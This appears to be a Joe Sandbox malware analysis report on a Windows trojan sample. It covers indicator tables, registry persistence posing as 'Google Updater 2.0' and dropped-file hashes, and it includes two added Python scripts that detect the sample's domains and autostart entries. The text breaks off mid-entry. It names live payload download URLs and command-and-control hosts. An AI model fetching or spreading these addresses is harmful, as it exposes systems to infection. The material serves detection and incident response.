https://contoso.com/Icon | powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | false | | high
http://estrelladamm.icu/old/get.php | explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://rusianlover.icu/forum/logout.php?id=2442663t | explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.mi | powershell.exe, 00000025.00000002.358882072.00000248FF834000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.digicert | explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://l0ioz.icu/pub/bin.exe | explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp; iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmp | true | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmp | false | | high
http://estrelladamm.icu/old/GetDataAVK.exe2 | explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
Contacted public IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.55.228 | zakriasons.co | United States | 13335 | CLOUDFLARENETUS | true
212.114.52.43 | rusianlover.icu | Germany | 30823 | COMBAHTONcombahtonGmbHDE | true
8.210.47.214 | estrelladamm.icu | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true

Private IPs:

IP
192.168.2.1
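The domains, IPs and URLs in the tables above, turned into a matcher that runs over proxy, DNS and firewall log lines. This is an added example, not part of the Joe Sandbox report: the indicator values are copied from the report's tables, the check-in shape (/forum/logout.php with one of id=, pid= or page=) is generalised from the twenty-odd rusianlover.icu URLs listed, and the log format and sample lines are constructed.

```python
"""Match the network indicators listed in the report against log lines.

Added example, not part of the Joe Sandbox report. The domains, IPs and
payload URLs are copied from the report's tables; the check-in shape is
generalised from the rusianlover.icu URLs listed. The log line format is
a constructed assumption and the sample lines are made up.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

C2_DOMAINS = {"rusianlover.icu", "estrelladamm.icu", "zakriasons.co", "l0ioz.icu"}
C2_IPS = {"212.114.52.43", "8.210.47.214", "104.21.55.228"}
PAYLOAD_URLS = {
    "http://estrelladamm.icu/old/GetDataAVK.exe",
    "http://zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe",
    "https://l0ioz.icu/pub/bin.exe",
}
# /forum/logout.php, bare or with only id=, pid= or page= parameters.
CHECKIN_PATH = "/forum/logout.php"
CHECKIN_PARAMS = {"id", "pid", "page"}

# Assumed log shape: "<timestamp> <client> <verb> <target>", where the verb is
# GET/POST (proxy, target is a URL), QUERY (DNS, target is a name) or
# CONNECT (firewall, target is ip:port).
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<verb>GET|POST|QUERY|CONNECT)\s+(?P<target>\S+)\s*$")


def is_checkin(parts):
    """True when a split URL has the sample's check-in path and only known parameters."""
    if parts.path != CHECKIN_PATH:
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    return set(params) <= CHECKIN_PARAMS   # an empty query is allowed too


def public_ip(text):
    """The address if it is a routable IP, else None (drops 192.168.2.1-style noise)."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return None
    return str(ip) if ip.is_global else None


def classify(verb, target):
    """Reason string for an indicator hit, or None."""
    if verb == "QUERY":
        return "c2-domain" if target.lower().rstrip(".") in C2_DOMAINS else None
    if verb == "CONNECT":
        ip = public_ip(target.rsplit(":", 1)[0])
        return "c2-ip" if ip in C2_IPS else None
    parts = urlsplit(target)
    host = (parts.hostname or "").lower()
    if target in PAYLOAD_URLS:
        return "payload-download"
    if host in C2_DOMAINS:
        return "c2-checkin" if is_checkin(parts) else "c2-domain"
    if host in C2_IPS:
        return "c2-ip"
    if is_checkin(parts):
        return "checkin-pattern"   # shape only, unknown host: review, do not block
    return None


def scan(lines):
    """One hit record per matching line; lines that do not parse are skipped."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue
        reason = classify(m["verb"], m["target"])
        if reason:
            hits.append({"line": n, "client": m["client"], "reason": reason, "target": m["target"]})
    return hits


SAMPLE_LOG = [  # constructed lines, not from the report
    "2021-03-10T11:42:05Z 10.0.0.15 QUERY rusianlover.icu",
    "2021-03-10T11:42:06Z 10.0.0.15 CONNECT 212.114.52.43:80",
    "2021-03-10T11:42:07Z 10.0.0.15 GET http://rusianlover.icu/forum/logout.php?id=1809723",
    "2021-03-10T11:42:08Z 10.0.0.15 GET http://estrelladamm.icu/old/GetDataAVK.exe",
    "2021-03-10T11:42:09Z 10.0.0.22 GET https://www.bing.com/",
    "2021-03-10T11:42:10Z 10.0.0.22 CONNECT 192.168.2.1:53",
    "2021-03-10T11:42:11Z 10.0.0.31 GET http://other.example/forum/logout.php?pid=438",
    "not a log line",
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h['line']}: {h['client']} {h['reason']} {h['target']}")
```

The parameter check compares names rather than values on purpose: the report lists one URL with a trailing "t" in the id (probably a truncated memory string), and a value regex would miss it. Three of the four domains sit behind Cloudflare or shared hosting, so block on the domain and the full payload URLs, not on the IPs alone.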

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:366082
                                    Start date:10.03.2021
                                    Start time:11:41:02
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 13m 45s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:Documento--SII--33875.bin (renamed file extension from bin to exe)
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:28
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:12
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.phis.troj.spyw.evad.winEXE@26/13@35/4
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 69.9% (good quality ratio 66.5%)
                                    • Quality average: 85.3%
                                    • Quality standard deviation: 26.4%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    Warnings:
                                    • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, svchost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 23.57.80.111, 13.88.21.125, 51.11.168.160, 52.137.90.34, 104.42.151.234, 205.185.216.10, 205.185.216.42, 51.103.5.186, 92.122.213.247, 92.122.213.194, 104.43.139.144, 20.54.26.129, 51.104.139.180, 52.155.217.156
                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, windowsupdate.redir.update.microsoft.com.nsatc.net, redir.update.microsoft.com.nsatc.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, windowsupdate.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
11:41:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0 C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
11:42:00 | API Interceptor | 12x Sleep call for process: CpSHySoEfzH.exe modified
11:42:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0 "C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"
11:42:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0 C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
11:42:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0 "C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"
11:42:28 | API Interceptor | 31x Sleep call for process: explorer.exe modified
11:42:32 | API Interceptor | 1x Sleep call for process: iom7q73oi.exe modified
11:42:35 | API Interceptor | 77x Sleep call for process: powershell.exe modified
11:42:35 | Autostart | Run: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0 "C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"
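The autostart rows in the timeline above (the same value written to HKCU and HKLM, to both Run and RunOnce, named "Google Updater 2.0" and pointing at a randomly named binary under C:\ProgramData, once without quotes around a path that contains spaces) as an audit script for those keys. This is an added example, not the report's own code: on Windows, read_live() enumerates the keys through winreg in both the 64-bit and 32-bit views (the report's HKCU64/HKLM64 rows are the 64-bit view); on any OS, audit() scores a list of constructed entries, so it can be checked offline. The heuristics and thresholds are assumptions.

```python
"""Audit Run/RunOnce autostart values for the pattern in this report's timeline.

Added example, not from the report. read_live() reads the live registry on
Windows (both registry views); audit() scores (hive, key, name, command)
tuples from any source. Heuristics and thresholds are assumptions.
"""
import re
import sys

RUN_KEYS = (
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
)
# Directories a user-mode dropper writes to; real updaters seldom autostart from here.
SUSPECT_DIRS = ("c:/programdata/", "/appdata/local/temp/", "/appdata/roaming/", "/users/public/")
# Where a vendor-named entry would normally live instead.
TRUSTED_PREFIXES = ("c:/program files", "c:/windows", "%programfiles%", "%windir%", "%systemroot%")
# Words used as cover in value names; "Google Updater 2.0" is the one in this report.
VENDOR_WORDS = ("google", "microsoft", "adobe", "java", "windows", "update")


def image_path(command):
    """Executable part of a Run value: the quoted token, else text up to the first .exe."""
    command = command.strip()
    m = re.match(r'"([^"]+)"', command)
    if m:
        return m.group(1)
    m = re.match(r"(.+?\.exe)(?=\s|$)", command, re.IGNORECASE)
    if m:
        return m.group(1)
    return command.split()[0] if command else ""


def findings(name, command):
    """Heuristic flags for one autostart value, in a fixed order."""
    path = image_path(command)
    low = path.replace("\\", "/").lower()
    stem = low.rsplit("/", 1)[-1].rsplit(".", 1)[0]
    out = []
    if any(d in low for d in SUSPECT_DIRS):
        out.append("unusual-location")
    if any(w in name.lower() for w in VENDOR_WORDS) and not low.startswith(TRUSTED_PREFIXES):
        out.append("vendor-lookalike-name")
    # e.g. 9sek3aw7533q9: long, lower-case, letters and digits mixed
    if re.fullmatch(r"[a-z0-9]{10,}", stem) and any(c.isdigit() for c in stem) and any(c.isalpha() for c in stem):
        out.append("random-basename")
    # The report's RunOnce value is unquoted although the path contains spaces.
    if not command.lstrip().startswith('"') and " " in path:
        out.append("unquoted-path-with-spaces")
    return out


def audit(entries):
    """Return one record per entry that has at least one finding."""
    report = []
    for hive, key, name, command in entries:
        flags = findings(name, command)
        if flags:
            report.append({"hive": hive, "key": key, "name": name, "command": command, "findings": flags})
    return report


def read_live():
    """Enumerate Run/RunOnce values on Windows in both registry views; empty list elsewhere."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    hives = (("HKCU", winreg.HKEY_CURRENT_USER), ("HKLM", winreg.HKEY_LOCAL_MACHINE))
    for hive_name, hive in hives:
        for sub in RUN_KEYS:
            for view in (winreg.KEY_WOW64_64KEY, winreg.KEY_WOW64_32KEY):
                try:
                    key = winreg.OpenKey(hive, sub, 0, winreg.KEY_READ | view)
                except OSError:
                    continue
                with key:
                    for i in range(winreg.QueryInfoKey(key)[1]):
                        name, data, _ = winreg.EnumValue(key, i)
                        entry = (hive_name, sub, name, str(data))
                        if entry not in entries:   # HKCU is not redirected, so views repeat
                            entries.append(entry)
    return entries


SAMPLE_ENTRIES = [  # constructed; the first two mirror the report's timeline rows
    ("HKCU", RUN_KEYS[1], "Google Updater 2.0", r"C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"),
    ("HKCU", RUN_KEYS[0], "Google Updater 2.0", r'"C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe"'),
    ("HKLM", RUN_KEYS[0], "SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("HKCU", RUN_KEYS[0], "OneDrive", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

if __name__ == "__main__":
    for rec in audit(read_live() or SAMPLE_ENTRIES):
        print(f"{rec['hive']}\\{rec['key']} [{rec['name']}] {rec['command']} -> {', '.join(rec['findings'])}")
```

The unquoted-path check matters beyond this sample: Windows resolves an unquoted "C:\ProgramData\Google Updater 2.0\..." by trying C:\ProgramData\Google.exe first, so such a value is also a hijack point for anyone who can write to that directory.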
Similar samples by IP:

Match | Associated Sample Name / URL | Detection | Context
104.21.55.228 | OnZH4ftMLU.exe | malicious | zakriasons.co/wp-includes/rest-api/endpoints/898/getwd.exe
212.114.52.43 | OnZH4ftMLU.exe | malicious | rusianlover.icu/forum/logout.php
8.210.47.214 | OnZH4ftMLU.exe | malicious | estrelladamm.icu/old/GetDataAVK.exe

Similar samples by domain:

Match | Associated Sample Name / URL | Detection | Context
rusianlover.icu | OnZH4ftMLU.exe | malicious | 212.114.52.43
estrelladamm.icu | OnZH4ftMLU.exe | malicious | 8.210.47.214
zakriasons.co | OnZH4ftMLU.exe | malicious | 104.21.55.228

Similar samples by ASN:

Match | Associated Sample Name / URL | Detection | Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | OnZH4ftMLU.exe | malicious | 8.210.47.214
 | subscription_1615310237.xls | malicious | 8.209.66.127
 | subscription_1615310237.xls | malicious | 8.209.66.127
 | document-1317854575.xls | malicious | 8.210.31.137
 | document-1317854575.xls | malicious | 8.210.31.137
 | COSCO Arrival Notice with Shipping CBHU9101943.xlsx | malicious | 8.209.68.209
 | Setup.exe | malicious | 8.210.66.206
 | Setup.exe | malicious | 8.210.66.206
 | subscription_1614969542.xls | malicious | 8.209.66.127
 | subscription_1614969542.xls | malicious | 8.209.66.127
 | virus.xls | malicious | 8.208.97.177
 | virus.xls | malicious | 8.208.97.177
 | 0304_87496944093261.doc | malicious | 47.254.131.254
 | 0304_56958375050481.doc | malicious | 47.254.131.254
 | Static.dll | malicious | 47.254.131.254
 | Static.dll | malicious | 47.254.131.254
 | msals.dll | malicious | 47.254.131.254
 | document-1996534889.xls | malicious | 8.209.68.209
 | document-1996534889.xls | malicious | 8.209.68.209
 | 0303_15995446253021.doc | malicious | 47.254.131.254
COMBAHTONcombahtonGmbHDE | OnZH4ftMLU.exe | malicious | 212.114.52.43
 | Sales Order confirmation_pdf.exe | malicious | 152.89.247.27
 | Purchase Order (2).exe | malicious | 152.89.247.74
 | Bestellung Nr. 20210038.exe | malicious | 152.89.247.75
 | SecuriteInfo.com.Variant.Razy.849114.20596.exe | malicious | 91.200.103.83
 | uitTYe3ZE5EMN3Z.exe | malicious | 45.154.4.68
 | mn9VCjzNP8ATu3F.exe | malicious | 45.154.4.68
 | Aa7MaN2ae5.exe | malicious | 45.138.172.158
 | 1RevKocjWoyhJ3y.exe | malicious | 45.154.4.68
 | Fichero19837123.txt.LNK | malicious | 45.138.172.29
 | Fichero19837123.txt.LNK | malicious | 45.138.172.29
 | rq0CWAh0pA.exe | malicious | 160.20.147.195
 | InvoiceApplication.exe | malicious | 45.147.229.44
 | item list _ pdf.exe | malicious | 160.20.147.107
 | 10.dll | malicious | 185.234.72.84
 | UbrikQvjSc.exe | malicious | 152.89.247.27
 | Invoice copy and Payment request.xlsx | malicious | 152.89.247.30
 | counters.dll | malicious | 45.155.173.242
 | OzRW6h38aL.dll | malicious | 45.155.173.242
 | 1d46a419ae040e2c284ce365d66c8971.exe | malicious | 45.154.4.68
CLOUDFLARENETUS | WcihqRt2vr.exe | malicious | 104.21.6.117
 | tToCMQdejt.exe | malicious | 104.21.3.86
 | m5bCbJdk7l.exe | malicious | 104.21.1.113
 | 6uRm50MU0l.exe | malicious | 23.227.38.74
 | kw8VTJCVE6.exe | malicious | 23.227.38.74
 | OnZH4ftMLU.exe | malicious | 104.21.55.228
 | Payment.exe | malicious | 172.67.174.240
 | Pro-doma 209901.exe | malicious | 172.67.188.154
 | نسخة بنك سويفت 0083212 pdf.exe | malicious | 162.159.134.233
 | PO_20210310.exe | malicious | 172.67.215.201
 | bpMiLDP382.exe | malicious | 104.17.63.50
 | CF10550U5400-PDF.exe | malicious | 162.159.135.233
 | PO#5666HGS_pdf.exe | malicious | 104.21.19.200
 | CF10550U5400-PDF.exe | malicious | 162.159.134.233
 | PAYMENT SWIFT.exe | malicious |
                                    • 104.21.19.200
                                    103_FT21068D79MB_0770989439.exeGet hashmaliciousBrowse
                                    • 104.21.19.200
                                    DIEN CHUYEN TIEN 09.03.2020.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    Purchase Order.80078.Scan.pdf....exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    H#U00f3a #U0111#U01a1n chi#U1ebfu l#U1ec7 PO # 79574.pdf.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    DOC 875674656-674667636.exeGet hashmaliciousBrowse
                                    • 172.67.188.154
                                    Match  Associated Sample Name / URL  SHA 256  Detection  Link  Context
                                    Match: 57f3642b4e37e28f5cbe3020c9331b4c
                                    Sample / URL: OnZH4ftMLU.exe, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: yytr.dll, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: vG4U0RKFY2.exe, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: evil.doc, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: davay (2).exe, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: davay.exe, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://notification1.bubbleapps.io/version-test?debug_mode=true, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://secureddoc.unicornplatform.com, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: 5fd9d7ec9e7aetar.dll, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: 5fd885c499439tar.dll, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://secureddoc.unicornplatform.com/, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: http://contoubi00.epizy.com/ubi/, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://secureddoc.unicornplatform.com, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: http://vcomdesign.com, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://aud-amplified.unicornplatform.com/, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://cloud.vectorworks.net/links/11eb34bf3e0b15d489a10aa721e465bf, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://dynalist.io/d/TcKkPvWijzGN4uv-0OCmM26A, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://app.nihaocloud.com/f/06096e5837654796a4d4/, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://ngor.zlen.com.ua/Restore/Click here to restore message automatically.html, Detection: malicious
                                    • 104.21.55.228
                                    Sample / URL: https://rebrand.ly/we9zn, Detection: malicious
                                    • 104.21.55.228
                                    Match  Associated Sample Name / URL  SHA 256  Detection  Link  Context
                                    Match: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                                    Sample / URL: OnZH4ftMLU.exe, Detection: malicious
                                    Match: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe
                                    Sample / URL: OnZH4ftMLU.exe, Detection: malicious
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1292
                                        Entropy (8bit):5.351662875791918
                                        Encrypted:false
                                        SSDEEP:24:3vQPpQrLAo4KAxX5qRPD42HOoVZnCvK39tCKnKJRSF8PQ9eF:oPerB4nqRL/HvfnCvO9tC4aR48Y9eF
                                        MD5:AC10FD09E6BB46F1ECB6FBBBC32BECA8
                                        SHA1:42C9BEBF04464BDF77CEF33ECE377F66832C2BCE
                                        SHA-256:0656EAD501AA0E11A199F00BAF5C6367BBD44FF736D8A4277C19FF6E27454492
                                        SHA-512:4F01D2DB224F17759BC03AEE508A732348AF43120FBA61107D11BE37399182D4CDFB6773D0A7E7F2B27FA1A9AC78395889D08DC8381DC995EAB322215DF8BEBB
                                        Malicious:false
                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):852996
                                        Entropy (8bit):5.888594490665969
                                        Encrypted:false
                                        SSDEEP:24576:vjmBlOdjWsqxOCNsYa/xHXhOCXlt4DOShLQK:n4yWZ
                                        MD5:2CED2C14EECE71C72C5E45E8A607BB4C
                                        SHA1:13A700A297A7E5697D69BB743C3B256AC10A14E2
                                        SHA-256:4EFD9A3FA2D25D6706213FEB3299DD0F73777AAD01217B9E3DF046064FDBBB7E
                                        SHA-512:199CB38D7F20F64B30D2CB2BA56DAB6C0D3B2685D85A990C085060752071B9620D131C5C25BBA9B3140C9816AE3515D6B7DBF794D3DD71DB15BB8D3F4EB04F06
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 40%
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].......................r.................................Rich...........................PE..L....BC`.....................p......C.............@.............................................................................(....................................................................................................................rdaals2.p...............................text............................... ..`.rdata..43.......@..................@..@.data............0..................@....idata..............................@....rsrc................ ..............@..@........................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe:14EDFC78
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4
                                        Entropy (8bit):1.5
                                        Encrypted:false
                                        SSDEEP:3:P:P
                                        MD5:DF108E9C42B3E9FC686EA496455DDCCA
                                        SHA1:9C6589C0729B36D7D1DCF11E6CCE1EB22E682450
                                        SHA-256:B6D6A7E37E23E7A65E964BC982979CEB94AB98A49FCCF77CB888388FAFA974EB
                                        SHA-512:CF22BC1802EDFAB355CD89B31B4DCF1B635A8617C56BCF7FE56E3C3883C27D0C67B799434E243A27ACC766234BF85B3118F863ADB66EC617AB9B8E780730C7A8
                                        Malicious:false
                                        Preview: ....
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asikjyeb.4ye.ps1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkdwgbaz.aea.psm1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy5a4in0.j2z.ps1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p1k4j5qt.gnv.psm1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe
                                        Process:C:\Windows\SysWOW64\explorer.exe
                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):680448
                                        Entropy (8bit):7.109386979695027
                                        Encrypted:false
                                        SSDEEP:12288:yjw3mhs2SwibEO3GplmjwyFFubW87S3/C/OeEzoWJHVazmcDV:yjw3mYwibEO3GplmjwyFFubx7P/cLPah
                                        MD5:50803BDBA827E6AE4600DA26B5E81800
                                        SHA1:E3650665DD57B79514D33FE8E8D8FF8429B52C55
                                        SHA-256:02DCE269070BFEC91E4F01A67D774167F8208F17211E8027D8A7FE3DC62A356B
